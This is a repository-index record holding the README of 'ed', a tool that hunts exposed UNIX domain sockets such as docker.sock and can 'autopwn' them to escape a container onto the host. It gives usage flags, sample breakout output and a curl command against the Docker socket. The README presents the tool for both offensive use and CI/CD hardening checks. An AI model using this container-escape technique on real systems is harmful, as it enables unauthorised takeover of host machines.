{"id":44492015,"url":"https://github.com/brompwnie/ed","last_synced_at":"2026-02-13T03:59:16.258Z","repository":{"id":64305061,"uuid":"170169034","full_name":"brompwnie/ed","owner":"brompwnie","description":"Ed is a tool used to identify and exploit accessible UNIX Domain Sockets","archived":false,"fork":false,"pushed_at":"2019-03-11T23:52:12.000Z","size":45,"stargazers_count":27,"open_issues_count":1,"forks_count":7,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-09-22T22:10:53.408Z","etag":null,"topics":["containers","docker","post-exploitation","sockets","unix"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/brompwnie.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-02-11T17:13:29.000Z","updated_at":"2024-08-12T19:45:43.000Z","dependencies_parsed_at":"2023-01-15T10:30:16.620Z","dependency_job_id":null,"html_url":"https://github.com/brompwnie/ed","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"purl":"pkg:github/brompwnie/ed","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/brompwnie","download_url":"https://codeload.github.com/brompwnie/ed/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29395804,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T00:53:09.511Z","status":"online","status_checked_at":"2026-02-13T02:00:10.076Z","response_time":78,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["containers","docker","post-exploitation","sockets","unix"],"created_at":"2026-02-13T03:59:15.478Z","updated_at":"2026-02-13T03:59:16.244Z","avatar_url":"https://github.com/brompwnie.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ed\nEd is a tool used to identify and exploit accessible UNIX Domain Sockets\n\n# What does it do?\nEd is a binary to help you find and exploit accessible UNIX domain sockets on a container or host. This is useful for example, hunting Docker.sock when it has been mounted to a non-default location and or not mounted with the default name i.e  \"/var/run/Docker.sock\". \n\n# Why ed?\nFinding exposed UNIX domain sockets, especially Docker.sock, is very useful ;) Ed can be useful in a DevOps process to ensure that containers do not have any unnecessarily exposed sockets or it can be used to exploit exposed sockets to achieve container breakout. Additionally, Ed can be used in a CI/CD pipeline.\n\n# Usage\nEd can be used to look for plain 'ol UNIX domain sockets, UNIX domain sockets that respond to HTTP requests or UNIX domain sockets that behave like Docker.sock. Ed by default searches from the CWD. To use Ed, get the binary on the host and use the following options:\n\n ```\n  ./ed -h\n[+] Hunt 'dem Socks\nUsage of ./ed:\n    -autopwn\n        Attempt to autopwn exposed sockets\n  -cicd\n        Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0\n  -docker\n        Hunt for docker.sock\n  -http\n        Hunt for Available UNIX Domain Sockets with HTTP\n  -interfaces\n        Display available network interfaces\n  -json\n        Return output in JSON format\n  -path string\n        Path to Start Scanning for UNIX Domain Sockets (default \".\")\n  -socket\n        Hunt for Available UNIX Domain Sockets (default true)\n  -verbose\n        Verbose output\n\n```\n\nExample: Autopwn exposed Docker UNIX Domain Socket\n\n```\nroot@2ae7f389d44c:/app# ./ed -path=/ -autopwn=true\n[+] Hunt 'dem Socks\n[+] Hunting Down UNIX Domain Sockets from: /\n[*] Valid Socket: /tmp/docker.mock\n[+] Attempting to autopwn\n[+] Hunting Docker Socks\n[+] Attempting to Autopwn:  /tmp/docker.mock\n[*] Getting Docker client...\n[*] Successfully got Docker client...\n[+] Attempting to escape to host...\nYou are now on the underlying host\n/ # \n/ # exit\n[*] Successfully exited TTY\n[+] Finished\n```\n\n Example: Look for exposed Docker.sock\n \n ```\n root@2ae7f389d44c:/app# ./ed -path=/    \n[+] Hunt 'dem Socks\n[+] Hunting Down UNIX Domain Sockets from: /\n[*] Valid Socket: /run/docker.sock\n \n ```\n \n Example: Look for exposed Docker.sock, attempt to pwn it and return an exit code of 1 for your CI\\CD test\n \n ```\n root@2ae7f389d44c:/app# ./ed_linux_amd64 -path=/ -cicd=true -autopwn=true\n[+] Hunt 'dem Socks\n[+] Hunting Down UNIX Domain Sockets from: /\n[*] Valid Socket: /run/docker.sock\n[+] Attempting to autopwn\n[+] Hunting Docker Socks\n[+] Attempting to Autopwn:  /run/docker.sock\n[*] Getting Docker client...\n[*] Successfully got Docker client...\n[+] Attempting to escape to host...\n[+] Attempting in CICD Mode\n[+] Finished\nroot@d20b953fc52f:/app# echo $?\n1\n \n ```\n \n And now that you have found an exposed Docker socket, you could go ahead and issue commands to the Docker daemon using CURL or just issue the -autopwn fag;):\n \n ```\n root@70a7cf3d4f93:/app# curl --unix-socket  /var/run/docker.sock http:/docker/info\n ..l00t\n ```\n \n # Testing\nEd can be tested with Docker, WARNING, mouting Docker.sock into containers is a very bad idea but if you want to test Ed, you can with the following:\n\n```\ndocker-compose build \u0026\u0026 docker-compose up\n...\nworker_1_fd52bdee04ce | [+] Hunt 'dem Socks\nworker_1_fd52bdee04ce | [+] Hunting Down UNIX Domain Sockets from: /\nworker_1_fd52bdee04ce | [*] Valid Socket: /run/docker.sock\ned_worker_1_fd52bdee04ce exited with code 0\n\n```\n\n# Demo\n\n[![asciicast](https://asciinema.org/a/oUkKmXvOGrT9QVbw8iQlbUxpA.png)](https://asciinema.org/a/oUkKmXvOGrT9QVbw8iQlbUxpA)\n \n # License\n Ed is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrompwnie%2Fed","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbrompwnie%2Fed","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrompwnie%2Fed/lists"}